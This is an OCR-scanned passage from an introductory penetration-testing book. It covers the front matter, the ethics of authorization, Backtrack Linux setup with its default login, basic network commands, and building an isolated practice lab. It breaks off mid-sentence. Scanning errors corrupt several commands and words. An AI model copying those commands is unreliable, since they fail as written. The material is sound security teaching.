· 8 years ago · Mar 08, 2018, 09:02 PM
1THE BASICS
2
3
4
5TH E BASICS OF
6HACKING
7AND PENETRATION
8
9
10
11Ethical Hacking and Penetration
12Testing Made Easy
13
14
15
16
17The Basics of Hacking
18and Penetration Testing
19
20
21
22This page intentionally left blank
23
24
25
26Patrick Engebretson
27
28
29
30Technical Editor
31
32James Broad
33
34
35
36AMSTERDAM • BOSTON • HEIDELBERG • LONDON • NEW YORK
37OXFORD • PARIS • SAN DIEGO • SAN FRANCISCO
38SINGAPORE • SYDNEY • TOKYO
39
40
41
42SYNGRESS
43
44
45
46ELSEVIER
47
48
49
50Syngress Press is an imprint of Elsevier
51
52
53
54Acquiring Editor: Angelina Ward
55Development Editor: Heather Scherer
56Project Manager: Jessica Vaughan
57Designer: Alisa Andreola
58
59Syngress is an imprint of Elsevier
60
61225 Wyman Street, Waltham, MA 02451, USA
62
63© 2011 Elsevier Inc. All rights reserved
64
65No part of this publication may be reproduced or transmitted in any form or by any means, electronic
66or mechanical, including photocopying, recording, or any information storage and retrieval system,
67without permission in writing from the publisher. Details on how to seek permission, further
68information about the Publisher's permissions policies and our arrangements with organizations such
69as the Copyright Clearance Center and the Copyright Licensing Agency, can be found at our
70website: www.elsevier.com/permissions.
71
72This book and the individual contributions contained in it are protected under copyright by the
73Publisher (other than as may be noted herein).
74
75Notices
76
77Knowledge and best practice in this field are constantly changing. As new research and experience
78
79broaden our understanding, changes in research methods or professional practices, may become necessary.
80
81Practitioners and researchers must always rely on their own experience and knowledge in evaluating
82
83and using any information or methods described herein. In using such information or methods they should be
84
85mindful of their own safety and the safety of others, including parties for whom they have a professional
86
87responsibility.
88
89To the fullest extent of the law, neither the Publisher nor the authors, contributors, or editors, assume
90any liability for any injury and/or damage to persons or properly as a matter of products liability,
91negligence or otherwise, or from any use or operation of any methods, products, instructions, or
92ideas contained in the material herein.
93
94Library of Congress Cataloging-in-Publication Data
95
96Engebretson, Pat (Patrick Henry), 1974-
97
98The basics of hacking and penetration testing : ethical hacking and penetration testing made easy / Patrick
99Engebretson.
100
101p. cm. - (Syngress basics series)
102
103Includes bibliographical references and index.
104
105ISBN 978-1-59749-655-1 (alk. paper)
106
1071. Computer security. 2. Computer hackers. 3. Computer software-Testing. 4. Computer crimes-
108Prevention. I. Title.
109
110QA76.9.A25E5443 2010
111
112005.8-dc23 2011018388
113
114British Library Cataloguing-in-Publication Data
115
116A catalogue record for this book is available from the British Library
117
118ISBN: 978-1-59749-655-1
119
120Printed in the United States of America
12111 12 13 14 15 10 9 8 7 6 5 4 3 2 1
122
123
124
125X^rking together to grow
126libraries in developing countries
127
128www.elsevier.com | www.bookaid.org | www.sabre.org
129
130
131
132ELSEVIER f Sabre Foundation
133
134
135
136For information on all Syngress publications visit our website at www.syngress.com
137
138
139
140This book is dedicated to God, Lorianna, Maggie, and Molly. You are the steel
141cables that bind me. I love you.
142
143
144
145This page intentionally left blank
146
147
148
149ACKNOWLEDGMENTS ix
150
151ABOUT THE AUTHOR xi
152
153ABOUT THE TECHNICAL EDITOR xiii
154
155INTRODUCTION xv
156
157CHAPTER 1 What Is Penetration Testing? 1
158
159CHAPTER 2 Reconnaissance 15
160
161CHAPTER 3 Scanning 43
162
163CHAPTER 4 Exploitation 65
164
165CHAPTER 5 Web-Based Exploitation 107
166
167CHAPTER 6 Maintaining Access with Backdoors and Rootkits 127
168
169CHAPTER 7 Wrapping Up the Penetration Test 145
170
171INDEX 157
172
173
174
175This page intentionally left blank
176
177
178
179
180Like most people, I have a list. The list is made up of life goals and dreams —
181things I would like to accomplish at some point in my life. Some of the
182items on the list are big, some small, some well-defined, stable, and concrete,
183whereas others are more transient and ambiguous — like early morning fog
184on the Lutsen Mountains, constantly changing and moving, sometimes even
185disappearing altogether only to reappear at a later date and time. Obviously,
186the list is not a stone tablet; it changes and updates as I move through life. A
187few things, however, have never moved off the list; they stand as the Mount
188Rushmore's in my life. Hundreds of feet high, carved into solid granite. Never
189changing. Always there. They gracefully weather the storms and vicissitudes of
190life and simply wait to be crossed off. Some are nobler, some are egotistical,
191and some are even whimsical. I have had the good fortune in my life to be able
192to cross off many of the items on my list. Even the big ones. This book repre-
193sents the crossing off of one of my "Rushmore" items. A presidential face to be
194sure (although I am not sure which face it actually represents ! ) .
195
196As with most things in life, this book, the end product that you see, is the cul-
197mination of many people's efforts and energies. So while I do get to cross this
198off my list, and while my name appears on the cover, please do not take that
199to mean that this book is my sole creation. Without the dedication, support,
200help, and advice from everyone involved, there is no doubt you would not be
201reading these words right now. Writing a proper "Acknowledgments" section
202by truly listing everyone involved would fill many, many pages — below you
203will find a simple attempt to say thanks. I apologize in advance if I forgot to
204mention anyone.
205
206MY WIFE
207
208What can I say that would justify or somehow verbalize what you mean to me?
209There is no doubt that this book is as much an effort on your part as mine. You
210gave me the wings of encouragement to fly and the dedication of long lonely
211days and nights while I worked on it. You never complained, never resisted,
212and were never upset when I needed more from you. Every man should be so
213lucky. I am who I am because of you. Thank you.
214
215MY GIRLS
216
217To my little Liebchens — you are the light of my life! I apologize for all early
218mornings, late nights, and long weekends. Bring on the sunroom, Little People,
219
220
221
222Acknowledgments
223
224
225
226Mary and Joseph, princesses, Barbie's, and the Pirate Ship! Daddy loves you
227more than life itself.
228
229MY FAMILY
230
231Thanks to my mother and father for the gift of education and teaching me to
232understand the value of hard work and dedication to a project. Thanks also to
233my other mother, who dedicated countless hours to reading and correcting my
234initial rough drafts.
235
236TO THE SYNGRESS TEAM
237
238Thanks for the opportunity! Thanks to the editing team; I appreciate all the
239hard work and dedication you gave to this project. Special thanks to Angelina
240Ward who ultimately earned a green light for the project, to Heather Scherer,
241my editor, for the countless hours and assistance, and to James Broad for the
242excellent eye and great suggestions throughout the technical review process.
243
244To keep up with news and happenings about the book, or other security-
245related content, feel free to follow: pengebretson on Twitter or visit my home-
246page: http://homepages.dsu.edu/pengebretson
247
248
249
250Dr. Patrick Engebretson obtained his Doctor of Science degree with a spe-
251cialization in information security from Dakota State University. He currently
252serves as an assistant professor of information assurance and also works as a
253senior penetration tester for a security firm in the Midwest. His research inter-
254ests include penetration testing, hacking, intrusion detection, exploitation,
255honey pots, and malware. In the past several years, he has published many
256peer-reviewed journal and conference papers in these areas. He has been
257invited by the Department of Homeland Security to share his research at the
258Software Assurance Forum in Washington, DC, and has also spoken at Black
259Hat in Las Vegas. He regularly attends advanced exploitation and penetration
260testing trainings from industry-recognized professionals and holds several cer-
261tifications. He teaches graduate and undergraduate courses in penetration test-
262ing, wireless security, and intrusion detection, and advanced exploitation.
263
264
265
266This page intentionally left blank
267
268
269
270James Broad (CISSP, C|EH, C)PTS, Security+, MBA) is the President and
271owner of Cyber-Recon, LLC, where he and his team of consultants special-
272ize in Information Security, Information Assurance, and Certification and
273Accreditation and offer other security consultancy services to corporate and gov-
274ernment clients.
275
276As a security professional with over 20 years of real-world IT experience, James
277is an expert in many areas of IT security, specializing in security engineering,
278penetration testing, and vulnerability analysis and research. He has provided
279security services in the Nation's most critical sectors including defense, law
280enforcement, intelligence, finance, and healthcare.
281
282James has a Master's of Business Administration degree with specialization in
283Information Technology (MBA/IT) from the Ken Blanchard College of Business,
284Bachelor's degrees in Computer Programming and Security Management from
285Southwestern University and is currently a Doctoral Learner pursuing a Ph.D.
286in Information Security from Capella University. He is a member of ISSA and
287(ISC) 2®. James currently resides in Stafford, Virginia with his family: Deanne,
288Micheal, and Temara.
289
290
291
292This page intentionally left blank
293
294
295
296
297I suppose there are several questions that may be running through your head
298as you contemplate reading this book: Who is the intended audience for this
299book? How is this book different from book V (insert your favorite title here)?
300Why should I buy it? Because these are all fair questions and I am asking you
301to plunk down your hard-earned cash, it is important to provide some answers
302to these questions.
303
304For people who are interested in learning about hacking and penetration test-
305ing, walking into a well-stocked bookstore can be as confusing as searching
306for "hacking" books at amazon.com. Initially, there appears to be an almost
307endless selection to choose from. Most large bookstores have several shelves
308dedicated to computer security books. They include books on programming
309security, web application security, rootkits and malware, penetration testing,
310and, of course, hacking. However, even the hacking books seem to vary in con-
311tent and subject matter. Some books focus on using tools but do not discuss
312how these tools fit together. Other books focus on hacking a particular subject
313but lack the broad picture.
314
315This book is intended to address these issues. It is meant to be a single starting
316point for anyone interested in the topics of hacking or penetration testing. The
317book will certainly cover specific tools and topics but will also examine how
318the tools fit together and how they rely on one another to be successful.
319
320WHO IS THE INTENDED AUDIENCE FOR THIS BOOK?
321
322This book is meant to be a very gentle yet thorough guide to the world of hack-
323ing and penetration testing. It is specifically aimed at helping you master the
324basic steps needed to complete a hack or penetration test without overwhelm-
325ing you. By the time you finish this book, you will have a solid understanding
326of the penetration testing process and you will be comfortable with the basic
327tools needed to complete the job.
328
329Specifically, this book is aimed at people who are new to the world of hack-
330ing and penetration testing, for those with little or no previous experience, for
331those who are frustrated by the inability to see the big picture (how the various
332tools and phases fit together), or for those looking to expand their knowledge
333of offensive security.
334
335In short this book is written for anyone who is interested in computer secu-
336rity, hacking, or penetration testing but has no prior experience and is not sure
337where to begin. A colleague and I call this concept "zero entry hacking" (ZEH),
338
339
340
341Introduction
342
343
344
345much like modern-day swimming pools. Zero entry pools gradually slope from
346the dry end to the deep end, allowing swimmers to wade in without feeling
347overwhelmed or without having a fear of drowning. The "zero entry" concept
348allows everyone the ability to use the pool regardless of age or swimming abil-
349ity. This book employs a similar technique. ZEH is designed to expose you to
350the basic concepts without overwhelming you. Completion of ZEH will pre-
351pare you for advanced courses and books.
352
353HOW IS THIS BOOK DIFFERENT FROM BOOK 'X'?
354
355When not spending time with my family, there are two things I enjoy doing:
356reading and hacking. Most of the time, I combine these hobbies by reading
357about hacking. As a professor and a penetration tester, you can imagine that my
358bookshelf is lined with many books on hacking, security, and penetration test-
359ing. As with most things in life, the quality and value of every book is different.
360Some books are excellent resources that have been used so many times that the
361bindings are literally falling apart. Others are less helpful and remain in nearly
362new condition. A book that does a good job of explaining the details without
363losing the reader is worth its weight in gold. Unfortunately, most of my per-
364sonal favorites, those that are worn and tattered, are either very lengthy (500 +
365pages) or very focused (an in-depth guide to a single topic). Neither of these is
366a bad thing; in fact, quite the opposite, it is the level of detail and the clarity of
367the authors' explanation that make them so great. But at the same time, a very
368large tome focused on a detailed subject of security can seem overwhelming to
369newcomers.
370
371Unfortunately, as a beginner trying to break into the security field and learn
372the basics of hacking, tackling one of these books can be both daunting and
373confusing. This book is different from other publications in two ways. First, it
374is meant for beginners; recall the concept of "zero entry." If you have never per-
375formed any type of hacking or you have used a few tools but are not quite sure
376what to do next (or how to interpret the results of the tool), this book is for
377you. The goal is not to bury you with details but to present a broad overview of
378the entire field.
379
380Naturally, the book will still cover each of the major tools needed to complete
381the steps in a penetration test, but it will not stop to examine all the in-depth
382or additional functionality for each of these tools. This will be helpful from the
383standpoint that it will focus on the basics, and in most cases allow us to avoid
384confusion caused by advanced features or minor differences in tool versions.
385
386For example, when we discuss port scanning, the chapter will discuss how to
387run the basic scans with the very popular port scanner Nmap. Because the book
388focuses on the basics, it becomes less important exactly which version of Nmap
389the user is running. Running a SYN scan using Nmap is exactly the same regard-
390less of whether you are conducting your scan with Nmap version 2 or version 5.
391This technique will be employed as often as possible, doing so should allow the
392
393
394
395Introduction
396
397
398
399reader to learn Nmap (or any tool) without having to worry about the changes
400in functionality that often accompany advanced features in version changes.
401
402The goal of this book is to provide general knowledge that will allow you to
403tackle advanced topics and books. Remember, once you have a firm grasp of
404the basics, you can always go back and learn the specific details and advanced
405features of a tool. In addition, each chapter will end with a list of suggested
406tools and topics that are outside the scope of this book but can be used for fur-
407ther study and to advance your knowledge.
408
409Beyond just being written for beginners, this book actually presents the infor-
410mation in a very unique way. All the tools and techniques we use in this book
411will be carried out in a specific order against a small number of related targets
412(all target machines will belong to the same subnet, and the reader will be able
413to easily recreate this "target" network to follow along). Readers will be shown
414how to interpret tool output and how to utilize that output to continue the
415attack from one chapter to the next.
416
417The use of a sequential and singular rolling example throughout the book will
418help readers see the big picture and better comprehend how the various tools
419and phases fit together. This is different from many other books on the mar-
420ket today, which often discuss various tools and attacks but fail to explain how
421those tools can be effectively chained together. Presenting information in a
422way that shows the user how to clearly move from one phase to another will
423provide valuable experience and allow the reader to complete an entire pene-
424tration test by simply following along with the examples in the book. This con-
425cept should allow the reader to get a clear understanding of the fundamental
426knowledge while learning how the various tools and phases connect.
427
428WHY SHOULD I BUY THIS BOOK?
429
430Even though the immediate answers to this question are highlighted in the
431preceding sections, below you will find a condensed list of reasons:
432
433â– You want to learn more about hacking and penetration testing but you are
434unsure of where to start.
435
436â– You have dabbled in hacking and penetration testing but you are not sure
437how all the pieces fit together.
438
439â– You want to learn more about the tools and processes that are used by
440hackers and penetration testers to gain access to networks and systems.
441
442â– You are looking for a good place to start building offensive security
443knowledge.
444
445â– You enjoy a challenge.
446
447
448
449This page intentionally left blank
450
451
452
453Information in This Chapter:
454
455â– Introduction to Backtrack Linux: Tools. Lots of Tools
456
457â– Working with Backtrack: Starting the Engine
458
459â– The Use and Creation of a Hacking Lab
460
461â– Phases of a Penetration Test
462
463
464
465INTRODUCTION
466
467Penetration testing can be denned as a legal and authorized attempt to locate
468and successfully exploit computer systems for the purpose of making those sys-
469tems more secure. The process includes probing for vulnerabilities as well as
470providing proof of concept (POC) attacks to demonstrate the vulnerabilities
471are real. Proper penetration testing always ends with specific recommendations
472for addressing and fixing the issues that were discovered during the test. On
473the whole, this process is used to help secure computers and networks against
474future attacks.
475
476Penetration testing is also known as
477
478â– Pen Testing
479> PT
480
481â– Hacking
482
483â– Ethical Hacking
484
485â– White Hat Hacking
486
487It is important to spend a few moments discussing the difference between pen-
488etration testing and vulnerability assessment. Many people (and vendors) in
489the security community incorrectly use these terms interchangeably. A vulner-
490ability assessment is the process of reviewing services and systems for poten-
491tial security issues, whereas a penetration test actually performs exploitation
492and POC attacks to prove that a security issue exists. Penetration tests go a step
493
494
495
496The Basics of Hacking and Penetration Testing
497
498
499
500beyond vulnerability assessments by simulating hacker activity and delivering
501live payloads. In this book, we will cover the process of vulnerability assess-
502ment as one of the steps utilized to complete a penetration test.
503
504Setting the Stage
505
506Understanding all the various players and positions in the world of hacking
507and penetration testing is central to comprehending the big picture. Let us start
508by painting the picture with broad brush strokes. Please understand that the
509following is a gross oversimplification; however, it should help you see the dif-
510ferences between the various groups of people involved.
511
512It may help to consider the Star Wars universe where there are two sides of the
513"force": Jedis and Siths. Good vs. Evil. Both sides have access to an incredible
514power. One side uses its power to protect and serve, whereas the other side uses
515it for personal gain and exploitation.
516
517Learning to hack is much like learning to use the force (or so I imagine!). The
518more you learn, the more power you have. Eventually, you will have to decide
519whether you will use your power for good or bad. There is a classic poster from
520the Star Wars Episode I movie that depicts Anakin as a young boy. If you look
521closely at Anakin's shadow in the poster, you will see it is the outline of Darth
522Vader. Try searching the Internet for "Anakin Darth Vader shadow" to see it.
523Understanding why this poster has appeal is critical. As a boy, Anakin had no
524aspirations of becoming Darth Vader, but it happened nonetheless.
525
526It is probably safe to assume that very few people get into hacking to become
527a super villain. The problem is that journey to the darkside is a slippery slope.
528However, if you want to be great, have the respect of your peers, and be gain-
529fully employed in the security workforce, you need to commit yourself to using
530your powers to protect and serve. Having a felony on your record is a one-way
531ticket to another profession. It is true that there is currently a shortage of quali-
532fied security experts, but even so, not many employers today are willing to take
533a chance, especially if those crimes involve computers.
534
535In the pen testing world, it is not uncommon to hear the terms "white hat" and
536"black hat" to describe the Jedis and Siths. Throughout this book, the terms
537"white hat," "ethical hacker," or "penetration tester" will be used interchange-
538ably to describe the Jedis. The Siths will be referred to as "black hats," "crack-
539ers," or "malicious attackers."
540
541It is important to note that ethical hackers complete many of the same activi-
542ties with many of the same tools as malicious attackers. In nearly every situ-
543ation, an ethical hacker should strive to act and think like a real black hat
544hacker. The closer the penetration test simulates a real-world attack, the more
545value it provides to the customer paying for the PT.
546
547Please note how the previous paragraph says "in nearly every situation." Even
548though white hats complete many of the same tasks with many of the same
549tools, there is a world of difference between the two sides. At its core, these
550
551
552
553What Is Penetration Testing? CHAPTER 1
554
555
556
557differences can be boiled down to three key points: authorization, motivation,
558and intent. It should be stressed that these points are not all inclusive, but they
559can be useful in determining if an activity is ethical or not.
560
561The first and simplest way to differentiate between white hats and black hats is
562authorization. Authorization is the process of obtaining approval before con-
563ducting any tests or attacks. Once authorization is obtained, both the penetra-
564tion tester and the company being audited need to agree upon the scope of the
565test. The scope includes specific information about the resources and systems
566to be included in the test. The scope explicitly defines the authorized targets
567for the penetration tester. It is important that both sides fully understand the
568authorization and scope of the PT. White hats must always respect the autho-
569rization and remain within the scope of the test. Black hats will have no such
570constraints on the target list.
571
572The second way to differentiate between an ethical hacker and a malicious
573hacker is through examination of the attacker's motivation. If the attacker is
574motivated or driven by personal gain, including profit through extortion or
575other devious methods of collecting money from the victim, revenge, fame, or
576the like, he or she should be considered a black hat. However, if the attacker
577is preauthorized and his or her motivation is to help the organization and
578improve their security, he or she can be considered a white hat.
579
580Finally, if the intent is to provide the organization a realistic attack simula-
581tion so that the company can improve its security through early discovery and
582mitigation of vulnerabilities, the attacker should be considered a white hat.
583It is also important to comprehend the critical nature of keeping PT findings
584confidential. Ethical hackers will never share sensitive information discovered
585during the process of a penetration testing with anyone other than the client.
586However, if the intent is to leverage information for personal profit or gain, the
587attacker should be considered a black hat.
588
589INTRODUCTION TO BACKTRACK LINUX:
590TOOLS. LOTS OF TOOLS
591
592A few years back, the open discussion or teaching of hacking techniques was
593considered a bit taboo. Fortunately, times have changed and people are begin-
594ning to understand the value of offensive security. Offensive security is now
595being embraced by organizations regardless of size or industries. Governments
596are also getting serious about offensive security. Many governments have gone
597on record stating they are actively building and developing offensive security
598capabilities.
599
600Ultimately, penetration testing should play an important role in the overall
601security of your organization. Just as policies, risk assessments, business con-
602tinuity planning, and disaster recovery have become integral components in
603keeping your organization safe and secure, penetration testing needs to be
604included in your overall security plan as well. Penetration testing allows you
605
606
607
608The Basics of Hacking and Penetration Testing
609
610
611
612to view your organization through the eyes of the enemy. This process can lead
613to many surprising discoveries and give you the time needed to patch your sys-
614tems before a real attacker can strike.
615
616One of the great things about learning how to hack today is the plethora and
617availability of good tools to perform your craft. Not only are the tools read-
618ily available, but many of them are stable with several years of development
619behind them. Maybe even more important to many of you is the fact that most
620of these tools are available free of charge. For the purpose of this book, every
621tool covered will be free.
622
623It is one thing to know a tool is free, it is another to find, compile, and install
624each of the tools required to complete even a basic penetration test. Although
625this process is quite simple on today's modern Linux OS's, it can still be a bit
626daunting for newcomers. Most people who start are usually more interested in
627learning how to use the tools than they are in searching the vast corners of the
628Internet locating and installing tools.
629
630To be fair, you really should learn how to manually compile and install soft-
631ware on a Linux machine; or at the very least, you should become familiar with
632apt-get (or the like).
633
634
635
636f \
637
638
639
640MORE ADVANCED
641
642
643
644APT, short for Advanced Package Tool, is a package management system. APT allows
645you to quickly and easily install, update, and remove software from the command
646line. Aside from its simplicity, one of the best things about APT is the fact that it
647automatically resolves dependency issues for you. This means that if the package
648you are installing requires additional software, APT will automatically locate and
649install the additional software. This is a massive improvement over the old days of
650"dependency hell."
651
652Installing software with APT is very straightforward. For example, let us assume you want
653to install the classic network-mapping tool Cheops. Once you know the name of the
654package you want to install, from the command line you can run apt - get install
655followed by the name of the software you want to install. It is always a good idea to run
656apt -get update before installing software. This will ensure that you are getting the
657latest version available. To install Cheops, we would issue the following commands:
658
659apt-get update
660apt-get i nstal 1 cheops
661
662Before the package is installed, you will be shown how much disk space will be used
663and you will be asked if you want to continue. To install your new software, you can
664type "Y" and hit the enter key.
665
666If you prefer not to use the command line, there are several GUIs available for
667interacting with APT. The most popular graphical front end is currently Aptitude.
668Additional package managers are outside the scope of this book.
669V J
670
671
672
673What Is Penetration Testing? CHAPTER 1
674
675
676
677A basic understanding of Linux will be beneficial and will pay you mountains
678of dividends in the long run. For the purpose of this book, there will be no
679assumption that you have prior Linux experience, but do yourself a favor and
680commit yourself to becoming a Linux guru someday. Take a class, read a book,
681or just explore on your own. Trust me, you will thank me later. If you are inter-
682ested in penetration testing or hacking, there is no way of getting around the
683need to know Linux.
684
685Fortunately, the security community is a very active and very giving group.
686There are several organizations that have worked tirelessly to create various
687security-specific Linux distributions. A distribution, or "distro" for short, is basi-
688cally a flavor, type, or brand of Linux.
689
690Among the most well known of these penetration testing distributions is one
691called "Backtrack. " Backtrack Linux is your one-stop shop for learning hacking
692and performing penetration testing. Backtrack Linux reminds me of that scene
693in the first Matrix movie where Tank asks Neo "What do you need besides a
694miracle?" Neo responds with "Guns. Lots of Guns." At this point in the movie,
695rows and rows of guns slide into view. Every gun imaginable is available for
696Neo and Trinity: handguns, rifles, shotguns, semiautomatic, automatic, big and
697small from pistols to explosives, an endless supply of different weapons from
698which to choose. That is a similar experience most newcomers have when they
699first boot up Backtrack. "Tools. Lots of Tools."
700
701Backtrack Linux is a hacker's dream come true. The entire distribution is built
702from the ground up for penetration testers. The distribution comes preloaded
703with hundreds of security tools that are installed, configured, and ready to
704be used. Best of all, Backtrack is free! You can get your copy at http://www.
705Backtrack-linux.org/downloads/.
706
707Navigating to the Backtrack link will allow you to choose from either an .iso or
708a VMware image. If you choose to download the .iso, you will need to burn the
709.iso to a DVD. If you are unsure of how to complete this process, please Google
710"burning an iso." Once you have completed the burning process, you will have
711a bootable DVD. In most cases, starting Backtrack from a bootable DVD is as
712simple as putting the DVD into the drive and restarting the machine. In some
713instances, you may have to change the boot order in the BIOS so that the opti-
714cal drive has the highest boot priority.
715
716If you choose to download the VMware image, you will also need software
717capable of opening and deploying or running the image. Luckily enough, there
718are several good tools for accomplishing this task. Depending on your prefer-
719ence, you can use VMware's VMware Player, Sun Microsystem's VirtualBox, or
720Microsoft's Virtual PC. In reality, if you do not like any of those options, there
721are many other software options capable of running a VM image. You simply
722need to choose one that you are comfortable with.
723
724Each of the three virtualization options listed above are available free of charge
725and will provide you with the ability to run VM images. You will need to
726
727
728
729The Basics of Hacking and Penetration Testing
730
731
732
733Start BackTrack FrameBuffer (1024x768)
734Start BackTrack FrameBuffer (899x608)
735Start BackTrack Forensics (no swap)
736Start BackTrack in Safe Graphical Mode
737Start Persistent Liue CD
738Start BackTrack in Text Node
739Start BackTrack Graphical Mode from RftM
740Hemory Test
741
742Boot the First Hard Disk
743
744
745
746FIGURE 1.1
747
748A Screenshot Showing the Boot Options When Using the Live DVD.
749
750decide which version is best for you. This book will rely heavily on the use of
751a Backtrack VMware image and VMware Player. At the time of writing, VMware
752Player was available at: http://www.vmware.com/products/player/. You will
753need to register for an account to download the software, but the registration
754process is simple and free.
755
756If you are unsure of which option to choose, it is suggested that you go the
757VMware route. Not only is this another good technology to learn, but using
758VMs will allow you to set up an entire penetration testing lab on a single
759machine. If that machine is a laptop, you essentially have a "travelling" PT lab
760so you can practice your skills anytime, anywhere.
761
762If you choose to run Backtrack using the bootable DVD, shortly after the sys-
763tem starts, you will be presented with a menu list. You will need to review the
764list carefully, as it contains several different options. The first couple of options
765are used to set some basic information about your system's screen resolution.
766If you are having trouble getting Backtrack to boot, be sure to choose the "Start
767Backtrack in Safe Graphical Mode." The menu contains several other options,
768but these are outside the scope of this book. To select the desired boot option,
769simply use the arrow keys to highlight the appropriate row and hit the enter
770key to confirm your selection. Figure 1 . 1 shows an example of the Backtrack
771boot screen.
772
773The use of Backtrack is not required to work through this book or to learn the
774basics of hacking. Any version of Linux will do fine. The major advantage of
775using Backtrack is that all the tools are preloaded for you. If you choose to use
776a different version of Linux, you will need to install the tools before reading
777the chapter. It is also important to remember that because this book focuses on
778the basics, it does not matter which version of Backtrack you are using. All the
779tools we will explore and use in this book are available in every version.
780
781WORKING WITH BACKTRACK: STARTING THE ENGINE
782
783Regardless of whether you choose to run Backtrack as a VM or boot to a Live
784DVD, once the initial system is loaded you will be presented with a log-in
785prompt. The default username is root and the default password is toor.
786
787
788
789What Is Penetration Testing? CHAPTER 1
790
791
792
793
794FIGURE 1.2
795
796Two Ways to Launch the Konsole (Terminal).
797
798Notice the default password is simply "root" spelled backward. This default
799username and password combination has been in use since Backtrack 1, and
800most likely it will remain in use for future versions. At this point, you should
801be logged into the system and should be presented with "root@bt:~#"
802prompt. Although it is possible to run many of the tools we will discuss in this
803book directly from the terminal, it is often easier for newcomers to make use
804of the X Window System. You can start the GUI by typing the following com-
805mand after the "root@bt~#" prompt:
806
807sta rtx
808
809After typing this command and hitting the Enter key, X will begin to load. This
810environment should seem vaguely familiar to most computer users. Once it
811has completely loaded, you will see a desktop, icons, a task bar, and a system
812tray. Just like Microsoft Windows, you can interact with these items by moving
813your mouse cursor and clicking on the desired object.
814
815Most of the programs we will use in this book will be run out of the termi-
816nal. You can start a terminal session by either clicking on the black box located
817in the lower left in the taskbar, or by typing the following command into the
818launcher as shown in Figure 1.2.
819
820konsol e
821
822Unlike Microsoft Windows or many of the modern-day Linux OS's, by default,
823Backtrack does not come with networking enabled. This setup is by design.
824As a penetration tester, we often try to maintain a stealthy or undetected pres-
825ence. Nothing screams "LOOK AT ME!! LOOK AT ME!! I'M HERE!!!" like a
826computer that starts up and instantly begins spewing network traffic by broad-
827casting requests for a DHCP server and IP address. To avoid this issue, the net-
828working interfaces of your Backtrack machine are turned down (off) by default.
829
830The easiest way to enable networking is through the terminal. Open a terminal
831window by clicking on the terminal icon as shown by the leftmost arrow in
832Figure 1.2. Once the terminal opens, enter the following command:
833
834ifconfig -a
835
836This command will list all the available interfaces for your machine. At a
837minimum, most machines will include an ethO and a 7 o interface. The "1 o"
838
839
840
841The Basics of Hacking and Penetration Testing
842
843
844
845interface is your loopback interface. The "ethO" is your first ethernet card.
846Depending on your hardware, you may have additional interfaces or differ-
847ent interface numbers listed. If you are running Backtrack through a VM, your
848main interface will usually be ethO.
849
850To turn the network card on, you enter the following command into a terminal
851window:
852
853ifconfig ethO up
854
855Let us examine this command in more detail; "i f config" is a Linux command
856that means "I want to configure a network interface." As we already know,
857"ethO" is the first network device on our system (remember computers often
858start counting at 0 not 1), and the keyword "up" is used to activate the inter-
859face. So we can roughly translate the command you entered as "I want to con-
860figure the first interface to be turned on."
861
862Now that the interface is turned on, we need to get an IP address. There are
863two basic ways to complete this task. Our first option is to assign the address
864manually by appending the desired IP address to the end of the previous com-
865mand. For example, if we wanted to assign our network card an IP address of
866192.168.1.23, we would type:
867
868ifconfig ethO up 192.168.1.23
869
870At this point, the machine will have an IP address but will still need a gateway
871and Domain Name System (DNS) server. A simple Google search for "setting
872up nic linux" will show you how to enter that information. You can always
873check to see if your commands worked by issuing the following command into
874a terminal window:
875
876i f config
877
878Running this will allow you to see the current settings for your network inter-
879faces. Because this is a beginner's guide and for the sake of simplicity, we will
880assume that stealth is not a concern at the moment. In that case, the easiest
881way to get an address is to use DHCP. To assign an address through DHCP, you
882simply issue the command:
883
884dhclient ethO
885
886Please note, this assumes you have already successfully run the command to
887turn up your network interface (ethO in this case).
888
889Now that we have successfully assigned an IP address, the last thing to address
890is how to turn off Backtrack. As with most things in Linux, there are multiple
891ways to accomplish this task. One of the easiest ways is to enter the following
892command into a terminal window:
893
894powerof f
895
896You can also substitute the poweroff command with the reboot command if
897you would prefer to restart the system rather than shut it down.
898
899
900
901What Is Penetration Testing? CHAPTER 1
902
903
904
905Before proceeding, you should take several minutes to review and practice all
906the steps highlighted thus far including
907
908â– Power on/Start up Backtrack
909
910â– Log in with the default user name and password
911
912â– Start X (the windows GUI)
913
914â– View all the network interfaces on your machine
915
916â– Turn up (on) the desired network interface
917
918â– Assign an IP address manually
919
920â– View the manually assigned IP address
921
922â– Assign an IP address through DHCP
923
924â– View the dynamically assigned address
925
926â– Reboot the machine using the command line interface
927
928â– Poweroff the machine using the command line interface
929
930THE USE AND CREATION OF A HACKING LAB
931
932Every ethical hacker must have a place to practice and explore. Most newcomers
933are confused about how they can learn to use hacking tools without breaking the
934law or attacking unauthorized targets. This is most often accomplished through
935the creation of a personal "hacking lab." A hacking lab is a sandboxed environ-
936ment where your traffic and attacks have no chance of escaping or reaching unau-
937thorized and unintended targets. In this environment, you are free to explore
938all the various tools and techniques without fear that some traffic or attack will
939escape your network. At a minimum, the lab is set up to contain at least two
940machines: one attacker and one victim. In other configurations, several victim
941machines can be deployed simultaneously to simulate a more realistic network.
942
943The proper use and setup of a hacking lab is vital because one of the most
944effective means to learn something is by doing that thing. Learning and master-
945ing the basics of penetration testing is no different.
946
947The single most crucial point of any hacker lab is the isolation of the network.
948You must configure your lab network in such a way that it is impossible for
949traffic to escape or travel outside of the network. Mistakes happen and even
950the most careful people can fat-fmger or mistype an IP address. It is a simple
951mistake to mistype a single digit in an IP address, but that mistake can have
952drastic consequences for you and your future. It would be a shame (and more
953importantly illegal) for you to run a series of scans and attacks against what
954you thought was your hacker lab target with an IP address of 172.16.1.1 only to
955find out later that you actually entered the IP address as 122. 1 6. 1 . 1 .
956
957The simplest and most effective way to create a sandboxed or isolated environ-
958ment is to physically unplug or disconnect your network from the Internet. If
959you are using physical machines, it is best to rely on hardwired Ethernet cables
960and switches to route traffic. Also be sure to double- and triple-check that all of
961your wireless NICs are turned off. Always carefully inspect and review your net-
962work for potential leaks before continuing.
963
964
965
966The Basics of Hacking and Penetration Testing
967
968
969
970Although the use of physical machines to create a hacking lab is an accept-
971able solution, the use of virtual machines provides several key benefits. First,
972given today's processing power, it is easy to set up and create a mini hacking
973lab on a single machine or laptop. In most cases, an average machine can run
974two or three virtual machines simultaneously because our targets can be set
975up using minimal resources. Even running on a laptop, it is possible to run
976two virtual machines at the same time. The added benefit of using a laptop is
977the fact that your lab is portable. With the cheap cost of external storage today,
978it is easily possible to pack hundreds of virtual machines on a single external
979hard drive; these can be easily transported and set up in a matter of minutes.
980Anytime you are interested in practicing your skills or exploring a new tool,
